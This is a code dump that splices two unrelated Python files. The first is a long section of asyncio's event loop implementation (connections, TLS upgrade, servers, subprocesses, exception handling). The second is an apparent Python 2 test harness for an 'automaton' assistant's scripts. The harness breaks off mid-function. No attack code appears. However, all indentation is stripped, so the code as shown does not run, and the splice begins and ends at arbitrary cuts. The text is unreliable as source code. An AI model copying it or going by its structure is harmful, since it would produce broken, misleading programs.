del handle._source_traceback[-1]
self._write_to_self()
return handle
def run_in_executor(self, executor, func, *args):
self._check_closed()
if self._debug:
self._check_callback(func, 'run_in_executor')
if executor is None:
executor = self._default_executor
# Only check when the default executor is being used
self._check_default_executor()
if executor is None:
executor = concurrent.futures.ThreadPoolExecutor(
thread_name_prefix='asyncio'
)
self._default_executor = executor
return futures.wrap_future(
executor.submit(func, *args), loop=self)
def set_default_executor(self, executor):
if not isinstance(executor, concurrent.futures.ThreadPoolExecutor):
raise TypeError('executor must be ThreadPoolExecutor instance')
self._default_executor = executor
def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
msg = [f"{host}:{port!r}"]
if family:
msg.append(f'family={family!r}')
if type:
msg.append(f'type={type!r}')
if proto:
msg.append(f'proto={proto!r}')
if flags:
msg.append(f'flags={flags!r}')
msg = ', '.join(msg)
logger.debug('Get address info %s', msg)
t0 = self.time()
addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
dt = self.time() - t0
msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
if dt >= self.slow_callback_duration:
logger.info(msg)
else:
logger.debug(msg)
return addrinfo
async def getaddrinfo(self, host, port, *,
family=0, type=0, proto=0, flags=0):
if self._debug:
getaddr_func = self._getaddrinfo_debug
else:
getaddr_func = socket.getaddrinfo
return await self.run_in_executor(
None, getaddr_func, host, port, family, type, proto, flags)
async def getnameinfo(self, sockaddr, flags=0):
return await self.run_in_executor(
None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
*, fallback=True):
if self._debug and sock.gettimeout() != 0:
raise ValueError("the socket must be non-blocking")
_check_ssl_socket(sock)
self._check_sendfile_params(sock, file, offset, count)
try:
return await self._sock_sendfile_native(sock, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
return await self._sock_sendfile_fallback(sock, file,
offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
# NB: sendfile syscall is not supported for SSL sockets and
# non-mmap files even if sendfile is supported by OS
raise exceptions.SendfileNotAvailableError(
f"syscall sendfile is not available for socket {sock!r} "
f"and file {file!r} combination")
async def _sock_sendfile_fallback(self, sock, file, offset, count):
if offset:
file.seek(offset)
blocksize = (
min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
)
buf = bytearray(blocksize)
total_sent = 0
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
break
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
break # EOF
await self.sock_sendall(sock, view[:read])
total_sent += read
return total_sent
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
def _check_sendfile_params(self, sock, file, offset, count):
if 'b' not in getattr(file, 'mode', 'b'):
raise ValueError("file should be opened in binary mode")
if not sock.type == socket.SOCK_STREAM:
raise ValueError("only SOCK_STREAM type sockets are supported")
if count is not None:
if not isinstance(count, int):
raise TypeError(
"count must be a positive integer (got {!r})".format(count))
if count <= 0:
raise ValueError(
"count must be a positive integer (got {!r})".format(count))
if not isinstance(offset, int):
raise TypeError(
"offset must be a non-negative integer (got {!r})".format(
offset))
if offset < 0:
raise ValueError(
"offset must be a non-negative integer (got {!r})".format(
offset))
async def _connect_sock(self, exceptions, addr_info, local_addr_infos=None):
"""Create, bind and connect one socket."""
my_exceptions = []
exceptions.append(my_exceptions)
family, type_, proto, _, address = addr_info
sock = None
try:
sock = socket.socket(family=family, type=type_, proto=proto)
sock.setblocking(False)
if local_addr_infos is not None:
for _, _, _, _, laddr in local_addr_infos:
try:
sock.bind(laddr)
break
except OSError as exc:
msg = (
f'error while attempting to bind on '
f'address {laddr!r}: '
f'{exc.strerror.lower()}'
)
exc = OSError(exc.errno, msg)
my_exceptions.append(exc)
else: # all bind attempts failed
raise my_exceptions.pop()
await self.sock_connect(sock, address)
return sock
except OSError as exc:
my_exceptions.append(exc)
if sock is not None:
sock.close()
raise
except:
if sock is not None:
sock.close()
raise
async def create_connection(
self, protocol_factory, host=None, port=None,
*, ssl=None, family=0,
proto=0, flags=0, sock=None,
local_addr=None, server_hostname=None,
ssl_handshake_timeout=None,
ssl_shutdown_timeout=None,
happy_eyeballs_delay=None, interleave=None):
"""Connect to a TCP server.
Create a streaming transport connection to a given internet host and
port: socket family AF_INET or socket.AF_INET6 depending on host (or
family if specified), socket type SOCK_STREAM. protocol_factory must be
a callable returning a protocol instance.
This method is a coroutine which will try to establish the connection
in the background. When successful, the coroutine returns a
(transport, protocol) pair.
"""
if server_hostname is not None and not ssl:
raise ValueError('server_hostname is only meaningful with ssl')
if server_hostname is None and ssl:
# Use host as default for server_hostname. It is an error
# if host is empty or not set, e.g. when an
# already-connected socket was passed or when only a port
# is given. To avoid this error, you can pass
# server_hostname='' -- this will bypass the hostname
# check. (This also means that if host is a numeric
# IP/IPv6 address, we will attempt to verify that exact
# address; this will probably fail, but it is possible to
# create a certificate for a specific IP address, so we
# don't judge it here.)
if not host:
raise ValueError('You must set server_hostname '
'when using ssl without a host')
server_hostname = host
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if ssl_shutdown_timeout is not None and not ssl:
raise ValueError(
'ssl_shutdown_timeout is only meaningful with ssl')
if sock is not None:
_check_ssl_socket(sock)
if happy_eyeballs_delay is not None and interleave is None:
# If using happy eyeballs, default to interleave addresses by family
interleave = 1
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
infos = await self._ensure_resolved(
(host, port), family=family,
type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
if local_addr is not None:
laddr_infos = await self._ensure_resolved(
local_addr, family=family,
type=socket.SOCK_STREAM, proto=proto,
flags=flags, loop=self)
if not laddr_infos:
raise OSError('getaddrinfo() returned empty list')
else:
laddr_infos = None
if interleave:
infos = _interleave_addrinfos(infos, interleave)
exceptions = []
if happy_eyeballs_delay is None:
# not using happy eyeballs
for addrinfo in infos:
try:
sock = await self._connect_sock(
exceptions, addrinfo, laddr_infos)
break
except OSError:
continue
else: # using happy eyeballs
sock, _, _ = await staggered.staggered_race(
(functools.partial(self._connect_sock,
exceptions, addrinfo, laddr_infos)
for addrinfo in infos),
happy_eyeballs_delay, loop=self)
if sock is None:
exceptions = [exc for sub in exceptions for exc in sub]
if len(exceptions) == 1:
raise exceptions[0]
else:
# If they all have the same str(), raise one.
model = str(exceptions[0])
if all(str(exc) == model for exc in exceptions):
raise exceptions[0]
# Raise a combined exception so the user can see all
# the various error messages.
raise OSError('Multiple exceptions: {}'.format(
', '.join(str(exc) for exc in exceptions)))
else:
if sock is None:
raise ValueError(
'host and port was not specified and no sock specified')
if sock.type != socket.SOCK_STREAM:
# We allow AF_INET, AF_INET6, AF_UNIX as long as they
# are SOCK_STREAM.
# We support passing AF_UNIX sockets even though we have
# a dedicated API for that: create_unix_connection.
# Disallowing AF_UNIX in this method, breaks backwards
# compatibility.
raise ValueError(
f'A Stream Socket was expected, got {sock!r}')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout,
ssl_shutdown_timeout=ssl_shutdown_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r connected to %s:%r: (%r, %r)",
sock, host, port, transport, protocol)
return transport, protocol
async def _create_connection_transport(
self, sock, protocol_factory, ssl,
server_hostname, server_side=False,
ssl_handshake_timeout=None,
ssl_shutdown_timeout=None):
sock.setblocking(False)
protocol = protocol_factory()
waiter = self.create_future()
if ssl:
sslcontext = None if isinstance(ssl, bool) else ssl
transport = self._make_ssl_transport(
sock, protocol, sslcontext, waiter,
server_side=server_side, server_hostname=server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout,
ssl_shutdown_timeout=ssl_shutdown_timeout)
else:
transport = self._make_socket_transport(sock, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def sendfile(self, transport, file, offset=0, count=None,
*, fallback=True):
"""Send a file to transport.
Return the total number of bytes which were sent.
The method uses high-performance os.sendfile if available.
file must be a regular file object opened in binary mode.
offset tells from where to start reading the file. If specified,
count is the total number of bytes to transmit as opposed to
sending the file until EOF is reached. File position is updated on
return or also in case of error in which case file.tell()
can be used to figure out the number of bytes
which were sent.
fallback set to True makes asyncio to manually read and send
the file when the platform does not support the sendfile syscall
(e.g. Windows or SSL socket on Unix).
Raise SendfileNotAvailableError if the system does not support
sendfile syscall and fallback is False.
"""
if transport.is_closing():
raise RuntimeError("Transport is closing")
mode = getattr(transport, '_sendfile_compatible',
constants._SendfileMode.UNSUPPORTED)
if mode is constants._SendfileMode.UNSUPPORTED:
raise RuntimeError(
f"sendfile is not supported for transport {transport!r}")
if mode is constants._SendfileMode.TRY_NATIVE:
try:
return await self._sendfile_native(transport, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
if not fallback:
raise RuntimeError(
f"fallback is disabled and native sendfile is not "
f"supported for transport {transport!r}")
return await self._sendfile_fallback(transport, file,
offset, count)
async def _sendfile_native(self, transp, file, offset, count):
raise exceptions.SendfileNotAvailableError(
"sendfile syscall is not supported")
async def _sendfile_fallback(self, transp, file, offset, count):
if offset:
file.seek(offset)
blocksize = min(count, 16384) if count else 16384
buf = bytearray(blocksize)
total_sent = 0
proto = _SendfileFallbackProtocol(transp)
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
return total_sent
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
return total_sent # EOF
await proto.drain()
transp.write(view[:read])
total_sent += read
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
await proto.restore()
async def start_tls(self, transport, protocol, sslcontext, *,
server_side=False,
server_hostname=None,
ssl_handshake_timeout=None,
ssl_shutdown_timeout=None):
"""Upgrade transport to TLS.
Return a new transport that *protocol* should start using
immediately.
"""
if ssl is None:
raise RuntimeError('Python ssl module is not available')
if not isinstance(sslcontext, ssl.SSLContext):
raise TypeError(
f'sslcontext is expected to be an instance of ssl.SSLContext, '
f'got {sslcontext!r}')
if not getattr(transport, '_start_tls_compatible', False):
raise TypeError(
f'transport {transport!r} is not supported by start_tls()')
waiter = self.create_future()
ssl_protocol = sslproto.SSLProtocol(
self, protocol, sslcontext, waiter,
server_side, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout,
ssl_shutdown_timeout=ssl_shutdown_timeout,
call_connection_made=False)
# Pause early so that "ssl_protocol.data_received()" doesn't
# have a chance to get called before "ssl_protocol.connection_made()".
transport.pause_reading()
transport.set_protocol(ssl_protocol)
conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
resume_cb = self.call_soon(transport.resume_reading)
try:
await waiter
except BaseException:
transport.close()
conmade_cb.cancel()
resume_cb.cancel()
raise
return ssl_protocol._app_transport
async def create_datagram_endpoint(self, protocol_factory,
local_addr=None, remote_addr=None, *,
family=0, proto=0, flags=0,
reuse_port=None,
allow_broadcast=None, sock=None):
"""Create datagram connection."""
if sock is not None:
if sock.type != socket.SOCK_DGRAM:
raise ValueError(
f'A UDP Socket was expected, got {sock!r}')
if (local_addr or remote_addr or
family or proto or flags or
reuse_port or allow_broadcast):
# show the problematic kwargs in exception msg
opts = dict(local_addr=local_addr, remote_addr=remote_addr,
family=family, proto=proto, flags=flags,
reuse_port=reuse_port,
allow_broadcast=allow_broadcast)
problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
raise ValueError(
f'socket modifier keyword arguments can not be used '
f'when sock is specified. ({problems})')
sock.setblocking(False)
r_addr = None
else:
if not (local_addr or remote_addr):
if family == 0:
raise ValueError('unexpected address family')
addr_pairs_info = (((family, proto), (None, None)),)
elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
for addr in (local_addr, remote_addr):
if addr is not None and not isinstance(addr, str):
raise TypeError('string is expected')
if local_addr and local_addr[0] not in (0, '\x00'):
try:
if stat.S_ISSOCK(os.stat(local_addr).st_mode):
os.remove(local_addr)
except FileNotFoundError:
pass
except OSError as err:
# Directory may have permissions only to create socket.
logger.error('Unable to check or remove stale UNIX '
'socket %r: %r',
local_addr, err)
addr_pairs_info = (((family, proto),
(local_addr, remote_addr)), )
else:
# join address by (family, protocol)
addr_infos = {} # Using order preserving dict
for idx, addr in ((0, local_addr), (1, remote_addr)):
if addr is not None:
if not (isinstance(addr, tuple) and len(addr) == 2):
raise TypeError('2-tuple is expected')
infos = await self._ensure_resolved(
addr, family=family, type=socket.SOCK_DGRAM,
proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
for fam, _, pro, _, address in infos:
key = (fam, pro)
if key not in addr_infos:
addr_infos[key] = [None, None]
addr_infos[key][idx] = address
# each addr has to have info for each (family, proto) pair
addr_pairs_info = [
(key, addr_pair) for key, addr_pair in addr_infos.items()
if not ((local_addr and addr_pair[0] is None) or
(remote_addr and addr_pair[1] is None))]
if not addr_pairs_info:
raise ValueError('can not get address information')
exceptions = []
for ((family, proto),
(local_address, remote_address)) in addr_pairs_info:
sock = None
r_addr = None
try:
sock = socket.socket(
family=family, type=socket.SOCK_DGRAM, proto=proto)
if reuse_port:
_set_reuseport(sock)
if allow_broadcast:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.setblocking(False)
if local_addr:
sock.bind(local_address)
if remote_addr:
if not allow_broadcast:
await self.sock_connect(sock, remote_address)
r_addr = remote_address
except OSError as exc:
if sock is not None:
sock.close()
exceptions.append(exc)
except:
if sock is not None:
sock.close()
raise
else:
break
else:
raise exceptions[0]
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_datagram_transport(
sock, protocol, r_addr, waiter)
if self._debug:
if local_addr:
logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
"created: (%r, %r)",
local_addr, remote_addr, transport, protocol)
else:
logger.debug("Datagram endpoint remote_addr=%r created: "
"(%r, %r)",
remote_addr, transport, protocol)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def _ensure_resolved(self, address, *,
family=0, type=socket.SOCK_STREAM,
proto=0, flags=0, loop):
host, port = address[:2]
info = _ipaddr_info(host, port, family, type, proto, *address[2:])
if info is not None:
# "host" is already a resolved IP.
return [info]
else:
return await loop.getaddrinfo(host, port, family=family, type=type,
proto=proto, flags=flags)
async def _create_server_getaddrinfo(self, host, port, family, flags):
infos = await self._ensure_resolved((host, port), family=family,
type=socket.SOCK_STREAM,
flags=flags, loop=self)
if not infos:
raise OSError(f'getaddrinfo({host!r}) returned empty list')
return infos
async def create_server(
self, protocol_factory, host=None, port=None,
*,
family=socket.AF_UNSPEC,
flags=socket.AI_PASSIVE,
sock=None,
backlog=100,
ssl=None,
reuse_address=None,
reuse_port=None,
ssl_handshake_timeout=None,
ssl_shutdown_timeout=None,
start_serving=True):
"""Create a TCP server.
The host parameter can be a string, in that case the TCP server is
bound to host and port.
The host parameter can also be a sequence of strings and in that case
the TCP server is bound to all hosts of the sequence. If a host
appears multiple times (possibly indirectly e.g. when hostnames
resolve to the same IP address), the server is only bound once to that
host.
Return a Server object which can be used to stop the service.
This method is a coroutine.
"""
if isinstance(ssl, bool):
raise TypeError('ssl argument must be an SSLContext or None')
if ssl_handshake_timeout is not None and ssl is None:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if ssl_shutdown_timeout is not None and ssl is None:
raise ValueError(
'ssl_shutdown_timeout is only meaningful with ssl')
if sock is not None:
_check_ssl_socket(sock)
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
if reuse_address is None:
reuse_address = os.name == "posix" and sys.platform != "cygwin"
sockets = []
if host == '':
hosts = [None]
elif (isinstance(host, str) or
not isinstance(host, collections.abc.Iterable)):
hosts = [host]
else:
hosts = host
fs = [self._create_server_getaddrinfo(host, port, family=family,
flags=flags)
for host in hosts]
infos = await tasks.gather(*fs)
infos = set(itertools.chain.from_iterable(infos))
completed = False
try:
for res in infos:
af, socktype, proto, canonname, sa = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error:
# Assume it's a bad family/type/protocol combination.
if self._debug:
logger.warning('create_server() failed to create '
'socket.socket(%r, %r, %r)',
af, socktype, proto, exc_info=True)
continue
sockets.append(sock)
if reuse_address:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
if reuse_port:
_set_reuseport(sock)
# Disable IPv4/IPv6 dual stack support (enabled by
# default on Linux) which makes a single socket
# listen on both address families.
if (_HAS_IPv6 and
af == socket.AF_INET6 and
hasattr(socket, 'IPPROTO_IPV6')):
sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_V6ONLY,
True)
try:
sock.bind(sa)
except OSError as err:
raise OSError(err.errno, 'error while attempting '
'to bind on address %r: %s'
% (sa, err.strerror.lower())) from None
completed = True
finally:
if not completed:
for sock in sockets:
sock.close()
else:
if sock is None:
raise ValueError('Neither host/port nor sock were specified')
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
sockets = [sock]
for sock in sockets:
sock.setblocking(False)
server = Server(self, sockets, protocol_factory,
ssl, backlog, ssl_handshake_timeout,
ssl_shutdown_timeout)
if start_serving:
server._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0)
if self._debug:
logger.info("%r is serving", server)
return server
async def connect_accepted_socket(
self, protocol_factory, sock,
*, ssl=None,
ssl_handshake_timeout=None,
ssl_shutdown_timeout=None):
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if ssl_shutdown_timeout is not None and not ssl:
raise ValueError(
'ssl_shutdown_timeout is only meaningful with ssl')
if sock is not None:
_check_ssl_socket(sock)
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, '', server_side=True,
ssl_handshake_timeout=ssl_handshake_timeout,
ssl_shutdown_timeout=ssl_shutdown_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r handled: (%r, %r)", sock, transport, protocol)
return transport, protocol
async def connect_read_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_read_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Read pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
async def connect_write_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_write_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Write pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
def _log_subprocess(self, msg, stdin, stdout, stderr):
info = [msg]
if stdin is not None:
info.append(f'stdin={_format_pipe(stdin)}')
if stdout is not None and stderr == subprocess.STDOUT:
info.append(f'stdout=stderr={_format_pipe(stdout)}')
else:
if stdout is not None:
info.append(f'stdout={_format_pipe(stdout)}')
if stderr is not None:
info.append(f'stderr={_format_pipe(stderr)}')
logger.debug(' '.join(info))
async def subprocess_shell(self, protocol_factory, cmd, *,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=False,
shell=True, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if not isinstance(cmd, (bytes, str)):
raise ValueError("cmd must be a string")
if universal_newlines:
raise ValueError("universal_newlines must be False")
if not shell:
raise ValueError("shell must be True")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = 'run shell command %r' % cmd
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=False,
shell=False, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if universal_newlines:
raise ValueError("universal_newlines must be False")
if shell:
raise ValueError("shell must be False")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
popen_args = (program,) + args
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = f'execute program {program!r}'
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, popen_args, False, stdin, stdout, stderr,
bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
def get_exception_handler(self):
"""Return an exception handler, or None if the default one is in use.
"""
return self._exception_handler
def set_exception_handler(self, handler):
"""Set handler as the new event loop exception handler.
If handler is None, the default exception handler will
be set.
If handler is a callable object, it should have a
signature matching '(loop, context)', where 'loop'
will be a reference to the active event loop, 'context'
will be a dict object (see `call_exception_handler()`
documentation for details about context).
"""
if handler is not None and not callable(handler):
raise TypeError(f'A callable object or None is expected, '
f'got {handler!r}')
self._exception_handler = handler
def default_exception_handler(self, context):
"""Default exception handler.
This is called when an exception occurs and no exception
handler is set, and can be called by a custom exception
handler that wants to defer to the default behavior.
This default handler logs the error message and other
context-dependent information. In debug mode, a truncated
stack trace is also appended showing where the given object
(e.g. a handle or future or task) was created, if any.
The context parameter has the same meaning as in
`call_exception_handler()`.
"""
message = context.get('message')
if not message:
message = 'Unhandled exception in event loop'
exception = context.get('exception')
if exception is not None:
exc_info = (type(exception), exception, exception.__traceback__)
else:
exc_info = False
if ('source_traceback' not in context and
self._current_handle is not None and
self._current_handle._source_traceback):
context['handle_traceback'] = \
self._current_handle._source_traceback
log_lines = [message]
for key in sorted(context):
if key in {'message', 'exception'}:
continue
value = context[key]
if key == 'source_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Object created at (most recent call last):\n'
value += tb.rstrip()
elif key == 'handle_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Handle created at (most recent call last):\n'
value += tb.rstrip()
else:
value = repr(value)
log_lines.append(f'{key}: {value}')
logger.error('\n'.join(log_lines), exc_info=exc_info)
def call_exception_handler(self, context):
"""Call the current event loop's exception handler.
The context argument is a dict containing the following keys:
- 'message': Error message;
- 'exception' (optional): Exception object;
- 'future' (optional): Future instance;
- 'task' (optional): Task instance;
- 'handle' (optional): Handle instance;
- 'protocol' (optional): Protocol instance;
- 'transport' (optional): Transport instance;
- 'socket' (optional): Socket instance;
- 'asyncgen' (optional): Asynchronous generator that caused
the exception.
New keys maybe introduced in the future.
Note: do not overload this method in an event loop subclass.
For custom exception handling, use the
`set_exception_handler()` method.
"""
if self._exception_handler is None:
try:
self.default_exception_handler(context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Second protection layer for unexpected errors
# in the default implementation, as well as for subclassed
# event loops with overloaded "default_exception_handler".
logger.error('Exception in default exception handler',
exc_info=True)
else:
try:
self._exception_handler(self, context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException as exc:
# Exception in the user set custom exception handler.
try:
# Let's try default handler.
self.default_exception_handler({
'message': 'Unhandled error in exception handler',
'exception': exc,
'context': context,
})
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Guard 'default_exception_handler' in case it is
# overloaded.
logger.error('Exception in default exception handler '
'while handling an unexpected error '
'in custom exception handler',
exc_info=True)
def _add_callback(self, handle):
"""Add a Handle to _scheduled (TimerHandle) or _ready."""
assert isinstance(handle, events.Handle), 'A Handle is required here'
if handle._cancelled:
return
assert not isinstance(handle, events.TimerHandle)
self._ready.append(handle)
def _add_callback_signalsafe(self, handle):
"""Like _add_callback() but called from a signal handler."""
self._add_callback(handle)
self._write_to_self()
def _timer_handle_cancelled(self, handle):
"""Notification that a TimerHandle has been cancelled."""
if handle._scheduled:
self._timer_cancelled_count += 1
def _run_once(self):
"""Run one full iteration of the event loop.
This calls all currently ready callbacks, polls for I/O,
schedules the resulting callbacks, and finally schedules
'call_later' callbacks.
"""
sched_count = len(self._scheduled)
if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
self._timer_cancelled_count / sched_count >
_MIN_CANCELLED_TIMER_HANDLES_FRACTION):
# Remove delayed calls that were cancelled if their number
# is too high
new_scheduled = []
for handle in self._scheduled:
if handle._cancelled:
handle._scheduled = False
else:
new_scheduled.append(handle)
heapq.heapify(new_scheduled)
self._scheduled = new_scheduled
self._timer_cancelled_count = 0
else:
# Remove delayed calls that were cancelled from head of queue.
while self._scheduled and self._scheduled[0]._cancelled:
self._timer_cancelled_count -= 1
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
timeout = None
if self._ready or self._stopping:
timeout = 0
elif self._scheduled:
# Compute the desired timeout.
when = self._scheduled[0]._when
timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)
event_list = self._selector.select(timeout)
self._process_events(event_list)
# Handle 'later' callbacks that are ready.
end_time = self.time() + self._clock_resolution
while self._scheduled:
handle = self._scheduled[0]
if handle._when >= end_time:
break
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
self._ready.append(handle)
# This is the only place where callbacks are actually *called*.
# All other places just add them to ready.
# Note: We run all currently scheduled callbacks, but not any
# callbacks scheduled by callbacks run this time around --
# they will be run the next time (after another I/O poll).
# Use an idiom that is thread-safe without using locks.
ntodo = len(self._ready)
for i in range(ntodo):
handle = self._ready.popleft()
if handle._cancelled:
continue
if self._debug:
try:
self._current_handle = handle
t0 = self.time()
handle._run()
dt = self.time() - t0
if dt >= self.slow_callback_duration:
logger.warning('Executing %s took %.3f seconds',
_format_handle(handle), dt)
finally:
self._current_handle = None
else:
handle._run()
handle = None # Needed to break cycles when an exception occurs.
def _set_coroutine_origin_tracking(self, enabled):
if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
return
if enabled:
self._coroutine_origin_tracking_saved_depth = (
sys.get_coroutine_origin_tracking_depth())
sys.set_coroutine_origin_tracking_depth(
constants.DEBUG_STACK_DEPTH)
else:
sys.set_coroutine_origin_tracking_depth(
self._coroutine_origin_tracking_saved_depth)
self._coroutine_origin_tracking_enabled = enabled
def get_debug(self):
return self._debug
def set_debug(self, enabled):
self._debug = enabled
if self.is_running():
self.call_soon_threadsafe(self._set_coroutine_origin_tracking, enabled)
|
TestHarness.py
|
import re
import threading
import time
import automaton.lib.exceptions as exceptions
# Format:
# key: scriptname, value: list of tuples to check
# tuple[0]: argument string
# tuple[1]: expected response (as regexp or straight string)
def notmatch(s):
return "^((?!%s).)*$" % s
test_data ={"echo": [("hello", "hello")],
"exe": [("echo hello", "hello")],
"gettime": [("", "\d{1,2}:\d{1,2} (A|P)M"),
("24", "\d{1,2}:\d{1,2}")],
"google": [("hello world", "A Hello world program is a computer.+")],
"latitude": [("", notmatch("Error")),
("noreverse", "\(-?\d+(\.\d+)?, -?\d+(\.\d+)?\)")],
"mail": [("", notmatch("Error"))],
"map": [("college station, texas to houston, texas",
notmatch("malformed"))],
"memo": [("testing success", "Inserted into memo file.")],
"music": [("play", notmatch("Error"))],
"pandora": [("g", notmatch("Error"))],
"say": [("This is a test of Automaton text to speech", "")],
"schedule": [("echo done! in ten and a half seconds", "Command scheduled."),
("echo first in one second", "Command scheduled."),
("echo absolute at 10:05pm", "Command scheduled."),
("echo absolute at 5:00 A.M.", "Command scheduled."),
("echo absolute at 5:00:4 AM", "Command scheduled."),
("echo absolute at 5:55", "Command scheduled.")],
"weather": [("", "(There is no weather data for this location)|"
"(The weather.+)"),
("Houston,tx", "(There is no weather data for this location)|"
"(The weather.+)"),
("last", "Data for.+")],
"wiki": [("hello", "\"Hello is a salutation or greeting.+")],
}
tests = ["google", "exe", "gettime", "echo", "google", "latitude", "mail", "map",
"weather", "wiki", "say"]
def test_client(client):
success = set()
failure = {}
for key in test_data:
if key in tests:
print "testing {0}...".format(key)
try:
if client.isService(key):
client.allowService(key)
for test in test_data[key]:
resp = client.interpret(" ".join([key, test[0]])).strip()
match = re.match(test[1] + "$", resp, flags=re.DOTALL)
if match and key not in failure:
success.add(key)
else:
failure[key] = "expected \"{0}\", got \"{1}\"".format(test[1], resp)
success.discard(key)
break
else:
failure[key] = "not loaded."
try:
text = client.serviceUsage(key)
if len(text) == 0:
failure[key + "-help"] = "Help is empty."
except AttributeError:
if "help" not in failure:
failure["help"] = "client.serviceUsage cannot be found"
except Exception as e:
failure[key] = "encountered exception during execution: " + e
success.discard(key)
if len(success) > 0:
print "Successful execution for:"
for script in success:
print " ", script
if len(failure) > 0:
print
print "Failed execution for:"
for key in failure:
print " ", key, ":", failure[key]
def test_server():
from automaton.server.pyro import PyroServer
import automaton.client.pyro as pyro
print "Starting test server"
server = PyroServer(port = 9090)
server.initialize()
thread = threading.Thread(target=server.start)
thread.daemon = True
thread.start()
time.sleep(3) # wait for server to initialize
success = set()
failure = {}
try:
client = pyro.ClientWrapper(appname="testharness",port=9090)
test = "interpreting without registering"
try:
